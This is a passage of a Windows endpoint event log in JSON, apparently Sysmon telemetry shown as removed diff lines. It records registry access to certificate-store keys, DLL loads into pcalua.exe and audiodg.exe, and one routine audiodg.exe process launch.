"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "xmllite.dll", - "image_path": "C:\\Windows\\System32\\xmllite.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "C:\\WINDOWS\\system32\\AUDIODG.EXE 0x318", - "event_type": "process", - "logon_id": 997, - "parent_process_name": "svchost.exe", - "parent_process_path": "C:\\Windows\\System32\\svchost.exe", - "pid": 6784, - "ppid": 2136, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "subtype": "create", - "timestamp": 131883573975300000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}", - "unique_ppid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}", - "user": "NT AUTHORITY\\LOCAL SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "LOCAL SERVICE" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "duser.dll", - "image_path": "C:\\Windows\\System32\\duser.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 